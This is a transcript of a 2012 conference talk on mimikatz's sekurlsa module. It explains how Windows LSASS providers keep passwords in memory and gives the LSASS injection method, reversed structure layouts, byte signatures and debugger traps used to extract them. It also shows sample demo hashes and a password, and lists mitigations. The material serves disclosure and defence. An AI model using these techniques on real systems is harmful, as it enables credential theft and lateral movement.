Benjamin DELPY `gentilkiwi` focus on sekurlsa / pass-the-pass

Presentation transcript:

mimikatz
Benjamin DELPY `gentilkiwi` focus on sekurlsa / pass-the-pass

Who ? Why ?
Benjamin DELPY `gentilkiwi`
- French
- 26y
- Kiwi addict
- Lazy programmer
Started to code mimikatz to :
- explain security concepts ;
- improve my knowledge ;
- prove to Microsoft that sometimes they must change old habits.
Why all in French ? because I’m … It limits script kiddies’ usage.
9/19/2018 Benjamin DELPY `gentilkiwi` @ PHDays 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz working
- On XP, 2003, Vista, 2008, Seven, 2008r2, 8, Server 8 ; x86 & x64
  - partial support for 8 & Server 8 (few kernel driver bugs ;))
  - 2000 support dropped with mimikatz 1.0
- Everywhere ; it’s statically compiled
- Two modes : direct action (local commands) – process or driver communication
Diagram, flattened :
- mimikatz.exe -> KeyIso « Isolation de clé CNG » in LSASS.EXE : direct action, crypto::patchcng
- mimikatz.exe -> SamSS « Gestionnaire de comptes de sécurité » in LSASS.EXE : VirtualAllocEx, WriteProcessMemory, CreateRemoteThread... to load sekurlsa.dll
- mimikatz.exe -> EventLog « Journal d’événements Windows » in SVCHOST.EXE : direct action, divers::eventdrop
- sekurlsa.dll, once inside LSASS : open a pipe ; write a welcome message ; wait for commands… and return results

mimikatz architecture
all in VC/C++ 2010 with some ASM…
- Generic modules : mod_crypto, mod_pipe, mod_inject, mod_memory, mod_parseur, mod_patch, mod_hive, mod_secacl, mod_privilege, mod_process, mod_service, mod_system, mod_thread, mod_ts, mod_text
- Command modules : mod_mimikatz_nogpo, mod_mimikatz_crypto, mod_mimikatz_divers, mod_mimikatz_winmine, mod_mimikatz_impersonate, mod_mimikatz_inject, mod_mimikatz_samdump, mod_mimikatz_standard, mod_mimikatz_handle, mod_mimikatz_system, mod_mimikatz_service, mod_mimikatz_process, mod_mimikatz_thread, mod_mimikatz_terminalserver, mod_mimikatz_privilege
- Executables : mimikatz.exe, KiwiCmd.exe, KiwiRegedit.exe, KiwiTaskmgr.exe
- Libraries : kappfree.dll, kelloworld.dll, klock.dll, sekurlsa.dll (sam, secrets, msv_1_0, wdigest, livessp, kerberos, tspkg)
- Driver : mimikatz.sys

mimikatz :: sekurlsa
what is it ?
- My favorite library !
- A thread that waits, in LSASS, for commands from mimikatz (or mubix’s meterpreter)
What can sekurlsa do from the inside ?
- Dump system secrets
- Dump SAM / DC base
- Dump clear text passwords/hashes from interactive sessions : MSV1_0 (dump/inject/delete), TsPkg, WDigest, LiveSSP, Kerberos
Let’s start an injection & pass the hash !

mimikatz :: sekurlsa
history of « pass-the-* » 1/2
Pass-the-hash
- 1997 - Unix modified SAMBA client for hashes usage ; Paul Ashton (EIGEN)
- 2000 - Private version of a Windows « LSA Logon Session Editor » ; Hernan Ochoa (CoreSecurity)
- 2007 - TechEd @ Microsoft ; Marc Murray (TrueSec) presents msvctl, and provides some downloads of it
- 2007 - « Pass the hash toolkit » published ; Hernan Ochoa (CoreSecurity)
- 2007 - mimikatz 0.1 includes pass the hash and is publicly available for x86 & x64 versions of Windows (yeah, by myself but in French ; so not famous ;))
- 2007 was the year of pass the hash !
Pass-the-ticket
- 04/2011 - wce (pass the hash toolkit evolution) provides Kerberos ticket support ; Hernan Ochoa (Ampliasecurity)

mimikatz :: sekurlsa
history of « pass-the-* » 2/2
Pass-the-pass
- 05/2011 – mimikatz 1.0 dumps the first clear text passwords from the TsPkg provider (but limited to NT 6 and some XP SP3) http://blog.gentilkiwi.com/securite/pass-the-pass
- 05/2011 – return of mimikatz ; it dumps clear text passwords from the WDigest provider (unlimited this time ;)) http://blog.gentilkiwi.com/securite/re-pass-the-pass
- 05/2011 – Some organizations opened cases with Microsoft about it…
- …Lots of time…
- begin of 2012 - Lots of blogs (and Kevin Mitnick ;)) say a few words about mimikatz
- 03/2012 - Hernan Ochoa (Ampliasecurity) publishes at seclists that wce supports WDigest password extraction… http://seclists.org/pen-test/2012/Mar/7
- 03/2012 – mimikatz strikes again with the LiveSSP provider and extracts Live login passwords from Windows 8 memory http://blog.gentilkiwi.com/securite/rere-pass-the-pass
- 03/2012 – yeah, once again…, more curious but Kerberos keeps passwords in memory http://blog.gentilkiwi.com/securite/rerere-pass-the-pass

mimikatz :: sekurlsa
let’s take a moment…
You noticed ? It has been one year since Microsoft was notified about password extraction from LSASS
- Without any reaction…
- But blacklisting mimikatz from MSE and FEP at 20120228 ;)

mimikatz :: sekurlsa :: tspkg
because sometimes hash is not enough…

mimikatz :: sekurlsa :: tspkg
what is it ?
- Microsoft introduces SSO capability for Terminal Server with NT 6 to improve RemoteApp and Remote Desktop users’ experience http://technet.microsoft.com/library/cc772108.aspx
- Relies on CredSSP with Credentials Delegation (!= Account delegation)
- Specs : http://download.microsoft.com/download/9/5/e/95ef66af-9026-4bb0-a41d-a4f81802d92c/%5Bms-cssp%5D.pdf
First impression : it seems cool
- User does not have to type its password
- Password is not in the RDP file
- Password is not in user secrets

mimikatz :: sekurlsa :: tspkg
demo time ! Explanations follow…
SSO demonstration on Terminal Server

mimikatz :: sekurlsa :: tspkg
questions ?
- KB says that for it to work, we must enable « Default credentials » delegation
  “Default credentials : The credentials obtained when the user first logs on to Windows” - https://msdn.microsoft.com/library/bb204773.aspx
- What ? Our User/Domain/{Password | Hash | Ticket} ? It seems so…
- In all cases, the system seems to be vulnerable to pass-the-*… In what form ?
Our specs : [MS-CSSP] 2.2.1.2.1 TSPasswordCreds
  The TSPasswordCreds structure contains the user's password credentials that are delegated to the server. (or PIN)
  TSPasswordCreds ::= SEQUENCE {
      domainName [0] OCTET STRING,
      userName   [1] OCTET STRING,
      password   [2] OCTET STRING
  }
Challenge / response for authentication ?
- Server : YES (TLS / Kerberos)
- Client : NO ; *password* is sent to the server…
So the password resides somewhere in memory ?
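To make concrete what the TSPasswordCreds structure carries, here is an added Python encoder/decoder for it (example code written for this page, not mimikatz's or Microsoft's). It assumes the explicit context tags [0]/[1]/[2] around OCTET STRINGs holding UTF-16LE text that CredSSP uses for these fields; the sample credentials are constructed.

```python
# Added example: minimal DER codec for the [MS-CSSP] TSPasswordCreds structure.
# Assumptions: explicit context tags [0]/[1]/[2] wrapping OCTET STRINGs that hold
# UTF-16LE text (the CredSSP encoding as understood here); sample data is constructed.

SEQUENCE = 0x30
OCTET_STRING = 0x04
CONTEXT_CONSTRUCTED = 0xA0          # class/form bits of a [n] EXPLICIT tag
FIELDS = ("domainName", "userName", "password")   # tag numbers 0, 1, 2


def _der_length(n: int) -> bytes:
    """DER length: short form below 128, long form otherwise."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def _tlv(tag: int, body: bytes) -> bytes:
    return bytes([tag]) + _der_length(len(body)) + body


def encode_ts_password_creds(domain: str, user: str, password: str) -> bytes:
    """TSPasswordCreds ::= SEQUENCE { domainName [0], userName [1], password [2] }"""
    members = b""
    for idx, text in enumerate((domain, user, password)):
        octets = _tlv(OCTET_STRING, text.encode("utf-16-le"))
        members += _tlv(CONTEXT_CONSTRUCTED | idx, octets)
    return _tlv(SEQUENCE, members)


def _read_tlv(buf: bytes, pos: int):
    """Return (tag, value, end_offset) for the TLV starting at pos."""
    if pos + 2 > len(buf):
        raise ValueError("truncated TLV header")
    tag, first = buf[pos], buf[pos + 1]
    pos += 2
    if first & 0x80:
        nbytes = first & 0x7F
        if nbytes == 0 or pos + nbytes > len(buf):
            raise ValueError("bad long-form length")
        length = int.from_bytes(buf[pos:pos + nbytes], "big")
        pos += nbytes
    else:
        length = first
    end = pos + length
    if end > len(buf):
        raise ValueError("TLV value runs past end of buffer")
    return tag, buf[pos:end], end


def decode_ts_password_creds(der: bytes) -> dict:
    """Parse the structure back into its three text fields."""
    tag, members, end = _read_tlv(der, 0)
    if tag != SEQUENCE or end != len(der):
        raise ValueError("expected exactly one SEQUENCE")
    creds, pos = {}, 0
    while pos < len(members):
        tag, inner, pos = _read_tlv(members, pos)
        if (tag & 0xE0) != CONTEXT_CONSTRUCTED or (tag & 0x1F) >= len(FIELDS):
            raise ValueError(f"unexpected tag {tag:#x}")
        itag, octets, iend = _read_tlv(inner, 0)
        if itag != OCTET_STRING or iend != len(inner):
            raise ValueError("expected a single OCTET STRING inside the context tag")
        creds[FIELDS[tag & 0x1F]] = octets.decode("utf-16-le")
    if set(creds) != set(FIELDS):
        raise ValueError("missing field(s)")
    return creds


def password_is_literal(der: bytes, password: str) -> bool:
    """The slide's point: no challenge/response on the client side, the password
    itself sits inside the structure (only TLS shields it on the wire)."""
    return password.encode("utf-16-le") in der


if __name__ == "__main__":
    # Constructed sample, not real credentials.
    blob = encode_ts_password_creds("DEMO", "termuser", "constructed-password")
    print(blob.hex())
    print(decode_ts_password_creds(blob))
    print("password literally present:", password_is_literal(blob, "constructed-password"))
```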

mimikatz :: sekurlsa :: tspkg
symbols & theory
Let’s explore some symbols ! sounds cool… (thanks Microsoft)
Let’s imagine a scenario :
- Enumerate all sessions to obtain information : Username, Domain, LUID
- Call tspkg!TSCredTableLocateDefaultCreds with the LUID to obtain : TS_CREDENTIAL
- Call tspkg!TSObtainClearCreds with TS_CREDENTIAL data (TS_PRIMARY_CREDENTIAL) for : TS_PRIMARY_CREDENTIAL with clear text credentials…
  kd> x tspkg!*clear*
  75016d1c tspkg!TSObtainClearCreds = <no type information>
  kd> x tspkg!*password*
  75011b68 tspkg!TSDuplicatePassword = <no type information>
  75011cd4 tspkg!TSHidePassword = <no type information>
  750195ee tspkg!TSRevealPassword = <no type information>
  75012fbd tspkg!TSUpdateCredentialsPassword = <no type information>
  kd> x tspkg!*locate*
  7501158b tspkg!TSCredTableLocateDefaultCreds = <no type information>

mimikatz :: sekurlsa :: tspkg
test & data
LsaEnumerateLogonSessions -> for each LUID -> tspkg!TSCredTableLocateDefaultCreds -> tspkg!TSObtainClearCreds -> password in clear ?

mimikatz :: sekurlsa :: tspkg
test & structures
LsaEnumerateLogonSessions (lazy way) -> for each LUID -> tspkg!TSCredTableLocateDefaultCreds -> KIWI_TS_CREDENTIAL -> KIWI_TS_PRIMARY_CREDENTIAL -> tspkg!TSObtainClearCreds -> password in clear ?

  /* the primary credential comes first so that the pointer in KIWI_TS_CREDENTIAL resolves */
  typedef struct _KIWI_TS_PRIMARY_CREDENTIAL {
      PVOID unk0;
      LSA_UNICODE_STRING Domaine;
      LSA_UNICODE_STRING UserName;
      LSA_UNICODE_STRING Password;
  } KIWI_TS_PRIMARY_CREDENTIAL, *PKIWI_TS_PRIMARY_CREDENTIAL;

  typedef struct _KIWI_TS_CREDENTIAL {
  #ifdef _M_X64
      BYTE unk0[0x88];
  #elif defined _M_IX86
      BYTE unk0[0x50];
  #endif
      PKIWI_TS_PRIMARY_CREDENTIAL pTsPrimary;
  } KIWI_TS_CREDENTIAL, *PKIWI_TS_CREDENTIAL;

mimikatz :: sekurlsa :: tspkg
first result
It worked !
- Since old Windows versions I hadn’t seen my Windows password
- I’ve been a little bit afraid
- After many hesitations, I published a post and a stable tool update on my blog at 20110508 http://blog.gentilkiwi.com/securite/pass-the-pass
But some issues :
- tspkg!TSCredTableLocateDefaultCreds & tspkg!TSObtainClearCreds are not exported
- tspkg!TSObtainClearCreds not always present…
- Calling conventions can be a problem
- Only NT6 and few XP SP3 (manual provider activation)

mimikatz :: sekurlsa :: tspkg
final implementation
LsaEnumerateLogonSessions -> for each LUID -> tspkg!TSGlobalCredTable + KIWI_TS_CREDENTIAL_AVL_SEARCH -> RtlLookupElementGenericTableAvl -> KIWI_TS_CREDENTIAL -> KIWI_TS_PRIMARY_CREDENTIAL -> LsaUnprotectMemory -> password in clear !

  typedef struct _KIWI_TS_CREDENTIAL_AVL_SEARCH {
  #ifdef _M_X64
      BYTE unk0[108];
  #elif defined _M_IX86
      BYTE unk0[64];
  #endif
      LUID LocallyUniqueIdentifier;
  /* arch split assumed here, mirroring unk0 : the slide lists both unk1 sizes without guards */
  #ifdef _M_X64
      BYTE unk1[46];
  #elif defined _M_IX86
      BYTE unk1[16];
  #endif
  } KIWI_TS_CREDENTIAL_AVL_SEARCH, *PKIWI_TS_CREDENTIAL_AVL_SEARCH;

  typedef struct _KIWI_TS_PRIMARY_CREDENTIAL {
      PVOID unk0;
      LSA_UNICODE_STRING Domaine;
      LSA_UNICODE_STRING UserName;
      LSA_UNICODE_STRING Password;
  } KIWI_TS_PRIMARY_CREDENTIAL, *PKIWI_TS_PRIMARY_CREDENTIAL;

  typedef struct _KIWI_TS_CREDENTIAL {
  #ifdef _M_X64
      BYTE unk0[0x88];
  #elif defined _M_IX86
      BYTE unk0[0x50];
  #endif
      PKIWI_TS_PRIMARY_CREDENTIAL pTsPrimary;
  } KIWI_TS_CREDENTIAL, *PKIWI_TS_CREDENTIAL;

mimikatz :: sekurlsa :: tspkg
demo time !

mimikatz :: sekurlsa :: tspkg
final result
It works better ;)
- No orphan referenced credentials
- More logical approach (we will see that later…)
We just have to find :
- tspkg!TSGlobalCredTable
- SeckPkgFunctionTable->LsaUnprotectMemory
  LSA_SECPKG_FUNCTION_TABLE : http://msdn.microsoft.com/library/windows/desktop/aa378510.aspx
  LsaUnprotectMemory : http://msdn.microsoft.com/library/windows/desktop/ff714510.aspx
Find this… We all have personal convictions on how to search for unexported data :
- Hardcoded addresses / offsets ;
- Disassembly engine ;
- Pattern matching ;
- …

mimikatz :: sekurlsa :: wdigest
because clear text password over http/https is not cool

mimikatz :: sekurlsa :: wdigest
what is it ?
“Digest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a user's web browser. It applies a hash function to a password before sending it over the network […]” Wikipedia : http://en.wikipedia.org/wiki/Digest_access_authentication
“Common Digest Authentication Scenarios :
- Authenticated client access to a Web site
- Authenticated client access using SASL
- Authenticated client access with integrity protection to a directory service using LDAP” Microsoft : http://technet.microsoft.com/library/cc778868.aspx
Again, it seems cool
- No password over the network, just hashes
- No reversible password in Active Directory ; hashes for each realm
  - Only with Advanced Digest authentication

mimikatz :: sekurlsa :: wdigest
what is it ?
We speak about hashes, but what hashes ?
  H   = MD5(HA1:nonce:[…]:HA2)
  HA1 = MD5(username:realm:password)
  HA2 = MD5(method:digestURI:[…])
- Even after login, HA1 may change… the realm is chosen server side and cannot be determined before Windows logon
- The WDigest provider must have the elements to compute responses for different servers : Username, Realm (from server), Password
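To see why the provider must retain the password rather than a hash, here is an added Python walk-through of the Digest computation above (RFC 2617, qop=auth form); it is example code for this page, not mimikatz's or Microsoft's, and the client and server classes are constructed for illustration.

```python
# Added example: RFC 2617 Digest computation, showing why a Digest client (such as
# the WDigest provider) must keep the password, while a server needs only HA1.
import hashlib
import hmac


def _md5_hex(text: str) -> str:
    return hashlib.md5(text.encode("utf-8")).hexdigest()


def ha1(username: str, realm: str, password: str) -> str:
    """HA1 = MD5(username:realm:password); the realm is chosen by the server."""
    return _md5_hex(f"{username}:{realm}:{password}")


def ha2(method: str, digest_uri: str) -> str:
    """HA2 = MD5(method:digestURI) (qop=auth form)."""
    return _md5_hex(f"{method}:{digest_uri}")


def response_from_ha1(h1: str, nonce: str, nc: str, cnonce: str, qop: str, h2: str) -> str:
    """response = MD5(HA1:nonce:nc:cnonce:qop:HA2) for qop=auth."""
    return _md5_hex(f"{h1}:{nonce}:{nc}:{cnonce}:{qop}:{h2}")


class DigestClient:
    """Constructed client that holds the clear password: it can answer any realm."""

    def __init__(self, username: str, password: str):
        self.username, self.password = username, password

    def answer(self, realm, nonce, method, uri, nc, cnonce, qop="auth"):
        h1 = ha1(self.username, realm, self.password)
        return response_from_ha1(h1, nonce, nc, cnonce, qop, ha2(method, uri))


class Ha1OnlyClient:
    """Constructed client that cached only HA1 per realm seen so far (no password)."""

    def __init__(self, username: str, ha1_by_realm: dict):
        self.username, self.ha1_by_realm = username, dict(ha1_by_realm)

    def answer(self, realm, nonce, method, uri, nc, cnonce, qop="auth"):
        h1 = self.ha1_by_realm.get(realm)
        if h1 is None:
            return None   # cannot respond: HA1 depends on a realm never seen before
        return response_from_ha1(h1, nonce, nc, cnonce, qop, ha2(method, uri))


def server_verify(stored_ha1, nonce, method, uri, nc, cnonce, qop, response) -> bool:
    """A server (or Advanced Digest in AD) stores HA1 per realm, never the password."""
    expected = response_from_ha1(stored_ha1, nonce, nc, cnonce, qop, ha2(method, uri))
    return hmac.compare_digest(expected, response)


if __name__ == "__main__":
    # Values from the RFC 2617 worked example.
    nonce, cnonce, nc = "dcd98b7102dd2f0e8b11d0f600bfb0c093", "0a4f113b", "00000001"
    client = DigestClient("Mufasa", "Circle Of Life")
    print("realm A:", client.answer("testrealm@host.com", nonce, "GET", "/dir/index.html", nc, cnonce))
    print("realm B:", client.answer("other.example", nonce, "GET", "/dir/index.html", nc, cnonce))
    cached = Ha1OnlyClient("Mufasa", {"testrealm@host.com": ha1("Mufasa", "testrealm@host.com", "Circle Of Life")})
    print("HA1-only client, realm B:", cached.answer("other.example", nonce, "GET", "/dir/index.html", nc, cnonce))
```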

mimikatz :: sekurlsa :: wdigest
theory
This time, we know :
- that WDigest keeps the password in memory « by protocol » for the HA1 digest
- that LSASS loves to unprotect passwords with LsaUnprotectMemory (so it protects them with LsaProtectMemory)
  - LsaUnprotectMemory : at offset 0xb4 of LSA_SECPKG_FUNCTION_TABLE
  - LsaProtectMemory : at offset 0xb0 of LSA_SECPKG_FUNCTION_TABLE
Let’s perform a search in WDigest :
  .text:7409D151 _DigestCalcHA1@8        call dword ptr [eax+0B4h]
  .text:74096C69 _SpAcceptCredentials@16 call dword ptr [eax+0B0h]
Hypothesis seems verified
- SpAcceptCredentials takes the clear password in its args
- Protects it with LsaProtectMemory
- Updates or inserts data in a doubly linked list : wdigest!l_LogSessList

mimikatz :: sekurlsa :: wdigest
test & data
LsaEnumerateLogonSessions -> for each LUID -> wdigest!l_LogSessList (search linked list for LUID) -> LsaUnprotectMemory -> password in clear ?

mimikatz :: sekurlsa :: wdigest
final implementation
LsaEnumerateLogonSessions -> for each LUID -> wdigest!l_LogSessList (search linked list for LUID) -> KIWI_WDIGEST_LIST_ENTRY -> LsaUnprotectMemory -> password in clear !

  typedef struct _KIWI_WDIGEST_LIST_ENTRY {
      struct _KIWI_WDIGEST_LIST_ENTRY *Flink;
      struct _KIWI_WDIGEST_LIST_ENTRY *Blink;
      DWORD UsageCount;
      struct _KIWI_WDIGEST_LIST_ENTRY *This;
      LUID LocallyUniqueIdentifier;
      […]
      LSA_UNICODE_STRING UserName;
      LSA_UNICODE_STRING Domaine;
      LSA_UNICODE_STRING Password;
  } KIWI_WDIGEST_LIST_ENTRY, *PKIWI_WDIGEST_LIST_ENTRY;

mimikatz :: sekurlsa :: wdigest
demo time !

mimikatz :: sekurlsa :: wdigest
result
It works again !
This time we just have to find :
- wdigest!l_LogSessList
- SeckPkgFunctionTable->LsaUnprotectMemory
  LSA_SECPKG_FUNCTION_TABLE : http://msdn.microsoft.com/library/windows/desktop/aa378510.aspx
  LsaUnprotectMemory : http://msdn.microsoft.com/library/windows/desktop/ff714510.aspx
Seems generalizable ?

mimikatz :: sekurlsa
and now what ?
In fact, with TsPkg and WDigest, passwords can be retrieved from any version of Windows...
- WDigest : XP, 2003 ; Vista / Seven / 2008 / 2008r2 ; 8, but not with a Live account
- TsPkg : XP SP3 (manual install) ; even with a Live account

mimikatz :: sekurlsa
and now what ?
- wce had not copied my TsPkg functionalities
- Only WDigest, so they missed 8 Live accounts…
Kiwi WDigest patterns (last public release) vs wce patterns : between ~17 occurrences of wdigest!l_LogSessList, maybe a coincidence…
For lack of TsPkg, can they be inspired by the next releases ?
  #ifdef _M_X64
  BYTE ptrInsertInLogSess[] = {0x4C, 0x89, 0x1B, 0x48, 0x89, 0x43, 0x08, 0x49, 0x89, 0x5B, 0x08, 0x48, 0x8D};
  #elif defined _M_IX86
  BYTE ptrInsertInLogSess[] = {0x8B, 0x45, 0x08, 0x89, 0x08, 0xC7, 0x40, 0x04};
  #endif

mimikatz :: sekurlsa :: livessp
because Microsoft was too good in closed networks

mimikatz :: sekurlsa :: livessp
how ?
Actually I’ve only used a logical (empirical) approach to search for passwords… : protocol reading, symbols searching ~ Boring ~…
Let’s be more brutal this time : make a WinDBG trap !
  0: kd> !process 0 0 lsass.exe
  PROCESS 83569040 SessionId: 0 Cid: 0224 Peb: 7f43f000 ParentCid: 01b4
      DirBase: 5df58100 ObjectTable: 80ce4740 HandleCount: <Data Not Accessible>
      Image: lsass.exe
  0: kd> .process /i 83569040
  You need to continue execution (press 'g' <enter>) for the context to be switched. When the debugger breaks in again, you will be in the new process context.
  0: kd> g
  Break instruction exception - code 80000003 (first chance)
  nt!RtlpBreakWithStatusInstruction:
  814b39d0 cc int 3
  0: kd> .reload /user
  Loading User Symbols ............................................................
  0: kd> bp /p @$proc lsasrv!LsaProtectMemory "kc 5 ; g"

mimikatz :: sekurlsa :: livessp
how ?
Let’s login with a Live account on Windows 8 !
Frames seen under lsasrv!LsaProtectMemory by the trap :
- livessp!LiveMakeSupplementalCred, livessp!LiveMakeSecPkgCredentials, livessp!LsaApLogonUserEx2, livessp!SpiLogonUserEx2 : our LiveSSP provider
- msv1_0!NlpAddPrimaryCredential, msv1_0!SspAcceptCredentials, msv1_0!SpAcceptCredentials : yeah, pass the hash capability with a Live account too…
- tspkg!TSHidePassword, tspkg!SpAcceptCredentials : Live user can logon through RDP via SSO
After credentials protection, LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)
  1: kd> uf /c livessp!LsaApLogonUserEx2
  livessp!LsaApLogonUserEx2 (74781536)
  [...]
  livessp!LsaApLogonUserEx2+0x560 (74781a96):
      call to livessp!LiveCreateLogonSession (74784867)

mimikatz :: sekurlsa :: livessp
final implementation
LsaEnumerateLogonSessions -> for each LUID -> livessp!LiveGlobalLogonSessionList (search linked list for LUID) -> KIWI_LIVESSP_LIST_ENTRY -> KIWI_LIVESSP_PRIMARY_CREDENTIAL -> LsaUnprotectMemory -> password in clear !

  /* the primary credential comes first so that the pointer in KIWI_LIVESSP_LIST_ENTRY resolves */
  typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL {
      DWORD isSupp;
      DWORD unk0;
      LSA_UNICODE_STRING UserName;
      LSA_UNICODE_STRING Domaine;
      LSA_UNICODE_STRING Password;
  } KIWI_LIVESSP_PRIMARY_CREDENTIAL, *PKIWI_LIVESSP_PRIMARY_CREDENTIAL;

  typedef struct _KIWI_LIVESSP_LIST_ENTRY {
      struct _KIWI_LIVESSP_LIST_ENTRY *Flink;
      struct _KIWI_LIVESSP_LIST_ENTRY *Blink;
      PVOID unk0;
      PVOID unk1;
      PVOID unk2;
      PVOID unk3;
      DWORD unk4;
      DWORD unk5;
      PVOID unk6;
      LUID LocallyUniqueIdentifier;
      LSA_UNICODE_STRING UserName;
      PVOID unk7;
      PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds;
  } KIWI_LIVESSP_LIST_ENTRY, *PKIWI_LIVESSP_LIST_ENTRY;

mimikatz :: sekurlsa :: livessp
demo time !

mimikatz :: sekurlsa
it was a cool trap, no ?
Even if we already have tools for normal accounts, are you not curious to test one with this trap ?*
* Me, yes

mimikatz :: sekurlsa :: kerberos
Let’s login with a normal account
After credentials protection, KerbCreateLogonSession calls :
- NT6 ; KerbInsertOrLocateLogonSession to insert data in KerbGlobalLogonSessionTable
- NT5 ; KerbInsertLogonSession to insert data in KerbLogonSessionList
Frames seen under lsasrv!LsaProtectMemory by the trap :
- kerberos!KerbHideKey, kerberos!KerbCreatePrimaryCredentials, kerberos!KerbCreateLogonSession, kerberos!SpAcceptCredentials : Kerberos, ticket part ? Maybe ;)
- kerberos!KerbHidePassword : Kerberos part for password ??????
- msv1_0!NlpAddPrimaryCredential, msv1_0!SspAcceptCredentials, msv1_0!SpAcceptCredentials
- wdigest!SpAcceptCredentials
- tspkg!TSHidePassword, tspkg!SpAcceptCredentials

mimikatz :: sekurlsa :: kerberos (nt 6)
final implementation
LsaEnumerateLogonSessions -> for each LUID -> Kerberos!KerbGlobalLogonSessionTable + KIWI_KERBEROS_LOGON_AVL_SEARCH -> RtlLookupElementGenericTableAvl -> KIWI_KERBEROS_PRIMARY_CREDENTIAL -> LsaUnprotectMemory -> password in clear !

  typedef struct _KIWI_KERBEROS_LOGON_AVL_SEARCH {
  #ifdef _M_X64
      BYTE unk0[64];
  #elif defined _M_IX86
      BYTE unk0[36];
  #endif
      LUID LocallyUniqueIdentifier;
  } KIWI_KERBEROS_LOGON_AVL_SEARCH, *PKIWI_KERBEROS_LOGON_AVL_SEARCH;

  typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL {
      DWORD unk0;
      PVOID unk1;
      PVOID unk2;
  #ifdef _M_X64
      BYTE unk3[96];
  #elif defined _M_IX86
      BYTE unk3[68];
  #endif
      LSA_UNICODE_STRING UserName;
      LSA_UNICODE_STRING Domaine;
      LSA_UNICODE_STRING Password;
  } KIWI_KERBEROS_PRIMARY_CREDENTIAL, *PKIWI_KERBEROS_PRIMARY_CREDENTIAL;

mimikatz :: sekurlsa :: kerberos (nt 5)
final implementation
LsaEnumerateLogonSessions -> for each LUID -> kerberos!KerbLogonSessionList (search linked list for LUID) -> KIWI_LIVESSP_PRIMARY_CREDENTIAL -> LsaUnprotectMemory -> password in clear !

  typedef struct _KIWI_KERBEROS_LOGON_SESSION {
      struct _KIWI_KERBEROS_LOGON_SESSION *Flink;
      struct _KIWI_KERBEROS_LOGON_SESSION *Blink;
      DWORD UsageCount;
      PVOID unk0;
      PVOID unk1;
      PVOID unk2;
      DWORD unk3;
      DWORD unk4;
      PVOID unk5;
      PVOID unk6;
      PVOID unk7;
      LUID LocallyUniqueIdentifier;
  #ifdef _M_IX86
      DWORD unk8;
  #endif
      DWORD unk9;
      DWORD unk10;
      PVOID unk11;
      DWORD unk12;
      DWORD unk13;
      PVOID unk14;
      PVOID unk15;
      PVOID unk16;
      […]
      LSA_UNICODE_STRING UserName;
      LSA_UNICODE_STRING Domaine;
      LSA_UNICODE_STRING Password;
  } KIWI_KERBEROS_LOGON_SESSION, *PKIWI_KERBEROS_LOGON_SESSION;

mimikatz :: sekurlsa :: kerberos
demo time !

mimikatz :: sekurlsa :: kerberos
« hu ? »
Ok. It works…* But why ?
  * Not at all logons on NT5
  * Can need an unlock…
From my understanding of Microsoft’s explanations, no need of passwords for the Kerberos protocol… all is based on the hash (not very sexy either)

mimikatz :: sekurlsa :: kerberos
BONUS « hu ? »
Microsoft’s implementation of Kerberos is full of logic…
- For password auth : password hash for the shared secret, but keeping the password in memory
- For full smartcard auth : No password on the client. No hash on the client ? NTLM hash on the client… the KDC sent it back as a gift

mimikatz :: sekurlsa
why is this dangerous ?
- Not a bug
- Not a weakness
- Not a vulnerability
- Not a 0-day (for now, there may be some too)
It’s “normal” that LSASS keeps passwords in memory for password-based providers when protocols need them
- And hashes for msv1_0…
- All of these rely on shared secrets…
So you can’t prevent Windows internal behaviors… (in a supported way)
- One change from Microsoft on protocols can impact all versions
- I don’t count on a fix or other things in the next [5;10] years…

mimikatz :: sekurlsa
what can we do ?
Basics
- No physical access to the computer (first step to pass the hash)
- No admin rights / system rights / debug privileges (…)
- Disable local admin accounts
- Strong passwords (haha, it was a joke)
- Network login instead of interactive (when possible)
- Audit ; pass the hash keeps traces and can lock accounts
- No admin rights / system rights / debug privileges, even for VIPs
More in depth
- Force strong authentication (SmartCard & Token) : $ / €
- Short validity for Kerberos tickets
- No delegation
- Disable NTLM (available with NT6)
- Nothing exotic : biometrics (it keeps the password somewhere and pushes it to Windows), single sign on
- Stop shared secrets for authentication : push Public / Private stuff (like keys ;))
- Take the opportunities to stop retrocompatibility
- Disable faulty providers ? Is it supported by Microsoft ? Even if, will you disable Kerberos and msv1_0 ?

mimikatz :: sekurlsa
Code it ! Implement it in Meta ! Discover !
Pass the hash :
  Package   Symbols                                      Description
  msv1_0    SeckPkgFunctionTable->GetCredentials         Get clear LM & NTLM hashes from LUID
            SeckPkgFunctionTable->LsaUnprotectMemory
            SeckPkgFunctionTable->LsaProtectMemory       Push clear LM & NTLM hashes to LUID
            SeckPkgFunctionTable->AddCredential
            SeckPkgFunctionTable->DeleteCredential       Delete hashes from LUID
Get passwords :
  Package          Symbols                                   Type
  tspkg            tspkg!TSGlobalCredTable                   RTL_AVL_TABLE
  wdigest          wdigest!l_LogSessList                     LIST_ENTRY
  livessp          livessp!LiveGlobalLogonSessionList        LIST_ENTRY
  kerberos (nt5)   kerberos!KerbLogonSessionList             LIST_ENTRY
  kerberos (nt6)   Kerberos!KerbGlobalLogonSessionTable      RTL_AVL_TABLE
  (all packages)   SeckPkgFunctionTable->LsaUnprotectMemory

mimikatz :: sekurlsa
little help to start !
Package / Data / Little help*
* @getLogonPasswords ; use the « full » keyword in argument of functions
msv1_0
  @getMSV
    msv1_0 :
     * Utilisateur : termuser
     * Domaine : DEMO
     * Hash LM : d0e9aee149655a6075e4540af1f22d3b
     * Hash NTLM : cc36cf7a8514893efccd332446158b1a
  @getMSVFunctions
    ** lsasrv.dll ** ; Statut recherche : OK :) – 3
    @GetCredentials = 000007F9C1C62938
    @AddCredential = 000007F9C1C71010
    @DeleteCredential = 000007F9C1C61F58
    @LsaUnprotectMemory = 000007F9C1C59960
    @LsaProtectMemory = 000007F9C1C628A4
tspkg
  @getTsPkg
    tspkg :
     * Mot de passe : waza1234/
  @getTsPkgFunctions
    ** tspkg.dll/lsasrv.dll ** ; Statut recherche : OK :)
    @TSGlobalCredTable = 000007F9C1557B20
wdigest
  @getWDigest
    wdigest :
  @getWDigestFunctions
    ** wdigest.dll/lsasrv.dll ** ; Statut recherche : OK :)
